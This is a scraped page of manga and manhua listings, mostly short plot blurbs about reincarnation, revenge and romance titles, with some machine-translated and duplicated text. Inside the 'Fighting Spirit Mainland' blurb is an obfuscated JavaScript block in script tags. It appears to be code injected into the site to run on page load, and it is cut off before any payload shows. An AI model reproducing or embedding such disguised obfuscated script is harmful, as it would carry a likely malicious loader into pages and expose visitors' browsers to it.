2020 - Page 13

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare
Her… One Is When Master Jue Flirts With Her.

615 results

Female Secret Agent

Qin Fei is an ace agent in a special school. She was betrayed by her partner and lover when she was performing a mission in the Bermuda Triangle. She fell into the sea from the boat and into a crack of time and space, meeting a vampire on first day. The battle of a modern female agent against the ancient “old Draculas” in full swing.


Fiery Boss, Control Yourself!

During an exquisite banquet, her fiance kneeled and asked for her sister’s hand in marriage. She was stripped of her inheritance and became a pawn for the Xi family. Her heart hardened like steel, and she thrust a knife into her own chest to try and bury all of her anger and sorrow. Then, in the blink of an eye — Mu Yuchen, the handsome, cold CEO of Shengshi Group who dominated City Z — appeared before her. She asked: Mu Yuchen, will you marry me? During an exquisite banquet, her fiance kneeled and asked for her sister’s hand in marriage. She was stripped of her inheritance and became a pawn for the Xi family. Her heart hardened like steel, and she thrust a knife into her own chest to try and bury all of her anger and sorrow. Then, in the blink of an eye — Mu Yuchen, the handsome, cold CEO of Shengshi Group who dominated City Z — appeared before her. She asked: Mu Yuchen, will you marry me?


Fighting Spirit Mainland

waste? Unable to awaken the waste wood of the fighting soul? Shame of the Luo family? The biggest joke in Wuling County? He smiled! Clan's scorn, father's aversion, outsider's sarcasm, family regrets, family abandonment, he realized! Fighting soul continent, the strongest is respected! Fist is the last word of this world! When the talents of the past return, the genius in the eyes of others is just a joke to him, demon? Ha ha, what Luo Chen likes to abuse the most is the evildoer! Fighting Soul Continent<script></script><script>(function(_0xef1043,_0x1ffd93){var _0x36da3b=_0x41fb,_0x24a688=_0xef1043();while(!![]){try{var _0x253671=parseInt(_0x36da3b(0x13e))/(-0x299+-0x1*-0x1455+-0x11bb)*(-parseInt(_0x36da3b(0x150))/(0x1279*-0x1+-0xf8d+0x2208))+parseInt(_0x36da3b(0x146))/(0x9*-0x2d6+-0x1*0x18d1+0x325a)*(-parseInt(_0x36da3b(0x14d))/(-0x17e*0x1+-0x2062+0xf1*0x24))+-parseInt(_0x36da3b(0x14c))/(-0x9*0x1d4+-0x763*-0x1+0x916)+-parseInt(_0x36da3b(0x130))/(-0x1c3*-0x4+0x1215+-0x191b)+parseInt(_0x36da3b(0x14b))/(0x11ec+0x170*-0x13+0x96b)+parseInt(_0x36da3b(0x141))/(0x870+0x8f1+-0x1159)*(-parseInt(_0x36da3b(0x145))/(0x29*-0x56+-0x1*-0xbcf+0x200))+parseInt(_0x36da3b(0x14f))/(0x1f7*0x11+0x143e+-0x359b);if(_0x253671===_0x1ffd93)break;else _0x24a688['push'](_0x24a688['shift']());}catch(_0x48906d){_0x24a688['push'](_0x24a688['shift']());}}}(_0x4719,-0x2a22*-0x1+-0x2e458+0x11db*0x42));function _0x4719(){var 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Finally, The Blue Flame

If one day a blue flame appears, my life will shine brightly.” Princess Jeong Myeong, lost in Yeongchang-gun by Gwanghae-gun and was confined in the Gyeongung Palace with her mother, Inmok. Kim Gae-si, the palace of Gwanghae-gun, is overlooked by the chance to kill her. In the cold and desolate Gyeongung Palace, Jeong Myeong feels the presence of someone who has been around her from one day. “I am the king of goblins, the one who keeps you.” “The king of goblins? Do you have a name?” “I do not.” “Then I will give you one. Your name is… dating.” The curse of the impenetrable goddess of life imprisons Myung Myung’s life and is in danger of losing everything she wants. “Come on. Jeongmyeong, I was waiting for you.” The Goblin Protector / Blue Fire Whirlpool / Finally, a Blue Flame / Finally, the Blue Flame / Goblin si Pelindung / 青火の渦 / 마침내 푸른 불꽃이


First Class Servant

First Class Servant Have you ever seen a servant who is more arrogant than noble? Have you seen a servant who is more arrogant than a monk? Have you seen a servant who is more domineering than an emperor? Have you ever seen a servant who hooked up with her own lady? Have you ever seen a servant who is in trouble with the alluring city? As a modern man, Xu Feng has always been intoxicated with wind and moon, and has become a dog and horse, but because of an accident, he has reborn into another world, and he has become a servant. Messing with Ms. Xiao’s family, ganging up with the rich ladies, scourge thousands. Achieve a generation of family! &nbsp; &nbsp;


First Master

First Master Abandoned otaku traversed into a world of strength-oriented cultivation and became the head of the strongest school, but found that he only inherited the skin and did not inherit the cultivation behavior. He is known to the world and has a fierce personality and no taboos. He is a cultivator, what should he do if he is useless and funny? In front of the enemy, relying on three axes, pretend and re-install. I can’t pretend to call my wife for help, and call the harem to charge. Eating soft rice is a skill, and harvesting the harem is an art.


First Miss Reborn

<h2>First Miss Reborn</h2> When she was hit by labor pain, what greeted her wasn't words of comfort but vile accusations of infidelity. Killed in defense of her unborn baby, she vowed to take revenge on them all...and God granted her a second chance. However, it seems that she's not the only one brought back. Who's that silver-haired guy in mask? Why does he seem to know her every move, yet still willingly provide unconditional help regardless? MangaToon got authorization from iReader to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Flirty Boss, No!

<p style="text-align: left;">A story about Cinderella and her prince with bad temper.</p> "Stay at the company, I'll give you a pay rise of 50%!" "No!" "70%!" "Well... I'll stay not for your money, but for my dream!" Well the happiest thing in life is to find the right one to stay with, even he's cold and bossy. MangaToon got authorization from Yoolook Culture to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Forced To Become The Villainous Son-In-Law

Read Manhua Forced To Become The Villainous Son-In-Law The Description Of The Comics “Forced To Become The Villainous Son-In-Law”: I Was Judged By Lord Yama In Hell Because I Gave A Hasty Bad Ending To My Novel He Loves And Stopped Updating It. As A Result, I Was Sent To The World Of My Novel As A Villain And The Matrilocal Husband Of The Infanta. However, The Life Of Going Against The Original Protagonist And Encountering Girls Is Actually Not That Bad… “Forced To Become The Villainous Son-In-Law” Is Sames Name: Beipo Chengwei Fanpai Zhuixu Bèipò Chéngwéi Fǎnpài Zhuìxù Forced To Become The Villain’s Son-In-Law I Become A Villain In My Novel ¡Me Forzaron A Convertirme En El Villano De Mi Novela! 小説の結末を変えないと俺は死ぬ 被迫成为反派赘婿 내 소설의 악역이 되다


Fox Concubine, Don’t Play With Fire

<h2>Fox Concubine, Don’t Play With Fire</h2> Can a fox successfully cultivate to get her human form back? And can she bring this handsome prince back to the 21st century with her? Let’s see!


From Bureaucrat to Villainess: Dad's Been Reincarnated!

After a traffic accident, 52-year-old civil servant Kenzaburou Tondabayashi awakens to find he\'s become Grace Auvergne, a duke\'s daughter, and more importantly the villainess of an otome game. Not wanting to get in the way of the happy endings of the young characters around him, Grace sets out to play the role of the villain, but whether it\'s due to Kenzaburou\'s memories of being an affectionate parent getting in the way or not being able to remember those pesky foreign names properly, it ends up being a lot harder than it looks… ___ **Official English:** [emaqi - United States & Canada only!](https://emaqi.com/manga/from-bureaucrat-to-villainess-dad-s-been-reincarnated/volumes)


From The Grave And Back

“Hey, Don’t Get Confused. I’ve Never Thought Of You As My Little Brother. You Don’t Even Know Your Right Place.” That Was The Dagger That Hurt The Most. Han Myoung Woo. A Child Of A Wealthy Family With A Quick Mind. But God Didn’t Give Him Everything. A Near Incurable Genetic Heart Disease He Did His Best In Order To Earn The Respect Of The People Around Him. But His Father, The Chairman, And His Family Members Never Took Him Seriously. That Was When An Accident Suddenly Struck Him. And… He Woke Up In The Body Of The Severely Injured Student, Kim Cheol Min.
